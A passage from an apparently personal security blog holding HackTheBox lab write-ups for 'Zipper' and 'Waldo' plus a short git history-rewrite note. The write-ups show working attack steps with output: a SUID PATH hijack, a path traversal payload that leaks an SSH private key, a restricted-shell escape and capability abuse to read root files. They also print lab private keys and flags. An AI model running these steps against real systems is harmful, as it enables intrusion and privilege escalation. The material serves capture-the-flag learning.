8QBB1nGO+J4lJKeZuW3vOI7+nK3RqRrdo+jCZ6B3mF9a037jacHxHZasaK3eYmgP
rTkd2quxAoGBAOat8gnWc8RPVHsrx5uO1bgVukwA4UOgRXAyDnzOrDCkcZ96aReV
UIq7XkWbjgt7VjJIIbaPeS6wmRRj2lSMBwf1DqZIHDyFlDbrGqZkcRv76/q15Tt0
oTn4x8SRZ8wdTeSeNRE3c5aFgz+r6cklNwKzMNuiUzcOoR8NSVOJPqJzAoGBAOPY
ks9+AJAjUTUCUF5KF4UTwl9NhBzGCHAiegagc5iAgqcCM7oZAfKBS3oD9lAwnRX+
zH84g+XuCVxJCJaE7iLeJLJ4vg6P43Wv+WJEnuGylvzquPzoAflYyl3rx0qwCSNe
8MyoGxzgSRrTFtYodXtXY5FTY3UrnRXLr+Q3TZYDAoGBALU/NO5/3mP/RMymYGac
OtYx1DfFdTkyY3y9B98OcAKkIlaA0rPh8O+gOnkMuPXSia5mOH79ieSigxSfRDur
7hZVeJY0EGOJPSRNY5obTzgCn65UXvFxOQCYtTWAXgLlf39Cw0VswVgiPTa4967A
m9F2Q8w+ZY3b48LHKLcHHfx7AoGATOqTxRAYSJBjna2GTA5fGkGtYFbevofr2U8K
Oqp324emk5Keu7gtfBxBypMD19ZRcVdu2ZPOkxRkfI77IzUE3yh24vj30BqrAtPB
MHdR24daiU8D2/zGjdJ3nnU19fSvYQ1v5ObrIDhm9XNFRk6qOlUp+6lW7fsnMHBu
lHBG9NkCgYEAhqEr2L1YpAW3ol8uz1tEgPdhAjsN4rY2xPAuSXGXXIRS6PCY8zDk
WaPGjnJjg9NfK2zYJqI2FN+8Yyfe62G87XcY7ph8kpe0d6HdVcMFE4IJ8iKCemNE
Yh/DOMIBUavqTcX/RVve0rEkS8pErQqYgHLHqcsRUGJlJ6FSyUPwjnQ=
-----END RSA PRIVATE KEY-----

3.Getting root

Getting root is more simple.
In util directory of ~/, there is a executable file which has SUID.

zapper@zipper:~/utils$ ls -la
total 24
drwxrwxr-x 2 zapper zapper 4096 Feb 21 04:20 .
drwxr-xr-x 6 zapper zapper 4096 Sep  9 19:12 ..
-rwxr-xr-x 1 zapper zapper  194 Sep  8 13:12 backup.sh
-rwxrwxr-x 1 zapper zapper   62 Feb 21 04:20 systemctl
-rwsr-sr-x 1 root   root   7556 Sep  8 13:05 zabbix-service

In that file, we can find that it is likely to use “systemctl” command.

placeholder

We can take advantage of this possible shell injection weakness.
We can create a shell which name is “systemctl” in the same directory and zabbix-service would execute it.

zapper@zipper:~/utils$ echo "cat /root/root.txt" > systemctl
zapper@zipper:~/utils$ chmod 777 systemctl 
zapper@zipper:~/utils$ ls -la
total 24
drwxrwxr-x 2 zapper zapper 4096 Oct 26 08:48 .
drwxr-xr-x 6 zapper zapper 4096 Oct 26 08:35 ..
-rwxr-xr-x 1 zapper zapper  194 Sep  8 13:12 backup.sh
-rwxrwxrwx 1 zapper zapper   19 Oct 26 08:48 systemctl
-rwsr-sr-x 1 root   root   7556 Sep  8 13:05 zabbix-service
zapper@zipper:~/utils$ ./zabbix-service 
start or stop?: start
a7c743d35b8efbedfd9336492a8eab6e
a7c743d35b8efbedfd9336492a8eab6e

Changing All Authors and Committers

23 Feb 2019

Environment

  • OS: Kali linux 2018.4
  • Git: 2.20.1

Explanation

Changing all authors and committers of git history.

Solution

root@kali:~# git filter-branch -f --env-filter "GIT_AUTHOR_NAME='1n4r1'; GIT_AUTHOR_EMAIL='1n4r1@protonmail.com'; GIT_COMMITTER_NAME='1n4r1'; GIT_COMMITTER_EMAIL='1n4r1@protonmail.com';" HEAD

This causes conflict between local git repo and remote.
After this command, we have to use git push –force.

root@kali:~/1n4r1.github.io# git push origin master
Username for 'https://github.com': 1n4r1
Password for 'https://1n4r1@github.com': 
To https://github.com/1n4r1/1n4r1.github.io.git
 ! [rejected]        master -> master (non-fast-forward)
error: failed to push some refs to 'https://github.com/1n4r1/1n4r1.github.io.git'
hint: Updates were rejected because the tip of your current branch is behind
hint: its remote counterpart. Integrate the remote changes (e.g.
hint: 'git pull ...') before pushing again.
hint: See the 'Note about fast-forwards' in 'git push --help' for details.


root@kali:~/1n4r1.github.io# git push -- force origin master
fatal: 'force' does not appear to be a git repository
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

Hackthebox Waldo Writeup

19 Feb 2019


Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Waldo” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.87 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-14 08:55 EEST
Nmap scan report for 10.10.10.87
Host is up (0.046s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 c4:ff:81:aa:ac:df:66:9e:da:e1:c8:78:00:ab:32:9e (RSA)
|   256 b3:e7:54:6a:16:bd:c9:29:1f:4a:8c:cd:4c:01:24:27 (ECDSA)
|_  256 38:64:ac:57:56:44:d5:69:de:74:a8:88:dc:a0:b4:fd (ED25519)
80/tcp   open     http           nginx 1.12.2
|_http-server-header: nginx/1.12.2
| http-title: List Manager
|_Requested resource was /list.html
|_http-trane-info: Problem with XML parsing of /evox/about
8888/tcp filtered sun-answerbook

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.79 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.87/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.87/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2018/09/14 08:58:10 Starting gobuster
=====================================================
2018/09/14 08:58:10 [-] Wildcard response found: http://10.10.10.87/e113ab7b-ef12-44fe-b1c0-effad3af0c0b => 302
2018/09/14 08:58:10 [!] To force processing of Wildcard responses, specify the '-fw' switch.
=====================================================
2018/09/14 08:58:10 Finished
=====================================================

2.Getting User

Sounds like an interesting web page is running on the server. placeholder

By inspecting with chrome development tool, we can find that it is html web page and controlled by “list.js”.

placeholder

In that file, there are some interesting php path in some functions.

root@kali:~# curl -i http://10.10.10.87/list.js

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 18 Sep 2018 21:34:34 GMT
Content-Type: application/javascript
Content-Length: 6245
Last-Modified: Thu, 03 May 2018 20:48:36 GMT
Connection: keep-alive
ETag: "5aeb75a4-1865"
Expires: Sun, 23 Sep 2018 21:34:34 GMT
Cache-Control: max-age=432000
Accept-Ranges: bytes

~~~

function readDir(path){ 
	var xhttp = new XMLHttpRequest();
	xhttp.open("POST","dirRead.php",false);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send('path=' + path);
	if (xhttp.readyState === 4 && xhttp.status === 200) {
		return xhttp.responseText;
	}else{
	}
}


function readFile(file){ 
	var xhttp = new XMLHttpRequest();
	xhttp.open("POST","fileRead.php",false);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send('file=' + file);
	if (xhttp.readyState === 4 && xhttp.status === 200) {
		return xhttp.responseText;
	}else{
	}
}

~~~

For instance, dirRead.php has Directory Traversal(?).
Which means we can see any directory on Waldo if we have a permission.

root@kali:~# curl -i -X POST http://10.10.10.87/dirRead.p "Content-Type: application/x-www-form-urlencoded" -d "path=./" 
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 18 Sep 2018 21:55:09 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.16

[".","..",".list","background.jpg","cursor.png","dirRead.php","face.png","fileDelete.php","fileRead.php","fileWrite.php","index.php","list.html","list.js"]

In addition, by taking advantage of fileRead.php, we can achieve one private key of private key for user nobody.

root@kali:/homefileRead.php -H "Content-Type: application/x-www-form-urlencoded" -d "file=....//....//....//home/nobody/.ssh/.monitor"
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 18 Sep 2018 23:20:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.16

{"file":"-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl\nmR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f\n87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS\ndGCc\/gNpW\/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN\no8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8\/6pceowqs9ujRkNzH9T1lJq4Fx1V\nvi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl\/wdmuPEW6kU\nvmzhRU3gcjuzwBET0TNejbL\/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR\/6\npKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5\n8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q\n1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox\/05qoOBL4kQxUM7\nVxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS\ndVa3yLECgYEA7jk51MvUGSIFF6GkXsNb\/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO\nv0og0X\/iROXAcp6Z9WGpIc6FhVgJd\/4bNlTR+A\/lWQwFt1b6l03xdsyaIyIWi9xr\nxsb2sLNWP56A\/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY\nqFfdAWrvVZjp26Yf\/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI\nyzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1\n\/pAcw\/+\/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw\/IMnLa3drm3CIAa32iU\nLRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ\/\nlnN2n1WyTIyEuGA\/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp\nw7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9\n1HLmBkDTjjj\/xAJAZuiOF4Rs\/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT\nrj1BhUCzZCUgQABtpC6vYj\/HLLlzpiC05AIEhDdvToPK\/0WuY64fds0VccAYmMDr\nX\/PlAoGAS6UhbCm5TWZhtL\/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2\nDvVny8gKbM\/OenwHnTlwRTEj5qdeAM40oj\/mwCDc6kpV1lJXrW2R5mCH9zgbNFla\nW0iKCBU

we can use it by command “ssh -i”

root@kali:~# ssh nobody@10.10.10.87 -i private_key 
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org>.

waldo:~$ cat user.txt
32768bcd7513275e085fd4e7b63e9d24

3.Getting root

We can find an interesting private key file in /home/monitor/.ssh

waldo:~/.ssh$ cat .monitor 
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl
mR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f
87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS
dGCc/gNpW/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN
o8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8/6pceowqs9ujRkNzH9T1lJq4Fx1V
vi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl/wdmuPEW6kU
vmzhRU3gcjuzwBET0TNejbL/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR/6
pKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5
8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q
1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox/05qoOBL4kQxUM7
VxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS
dVa3yLECgYEA7jk51MvUGSIFF6GkXsNb/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO
v0og0X/iROXAcp6Z9WGpIc6FhVgJd/4bNlTR+A/lWQwFt1b6l03xdsyaIyIWi9xr
xsb2sLNWP56A/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY
qFfdAWrvVZjp26Yf/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI
yzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1
/pAcw/+/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw/IMnLa3drm3CIAa32iU
LRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ/
lnN2n1WyTIyEuGA/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp
w7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9
1HLmBkDTjjj/xAJAZuiOF4Rs/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT
rj1BhUCzZCUgQABtpC6vYj/HLLlzpiC05AIEhDdvToPK/0WuY64fds0VccAYmMDr
X/PlAoGAS6UhbCm5TWZhtL/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2
DvVny8gKbM/OenwHnTlwRTEj5qdeAM40oj/mwCDc6kpV1lJXrW2R5mCH9zgbNFla
W0iKCBUAm5xZgU/YskMsCBMNmA8A5ndRWGFEFE+VGDVPaRie0ro=
-----END RSA PRIVATE KEY-----

By following command, we can get out of docker container as user “monitor”.

waldo:~/.ssh$ ssh monitor@localhost -i .monitor
Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64
Last login: Tue Jul 24 08:09:03 2018 from 127.0.0.1

~~~

-rbash: alias: command not found
monitor@waldo:~$

Without doing something, even we can not do “cd”.
To bypass restricted shell, we can take advantage of red command.

monitor@waldo:~$ cd ../
-rbash: cd: restricted
monitor@waldo:~$ red
!'/bin/sh'
$ cd /
$ ls
bin   etc	  initrd.img.old  lost+found  opt   run   sys  var
boot  home	  lib		  media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64		  mnt	      root  srv   usr  vmlinuz.old
$

Then, we can find a file which has weak permission (capability).

$ /sbin/getcap -r / 2>/dev/null        
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei

We found tac command.
Finally, what we have to do is specify full path of tac command and root.txt

$ /usr/bin/tac /root/root.txt
8fb67c84418be6e45fbd348fd4584f6c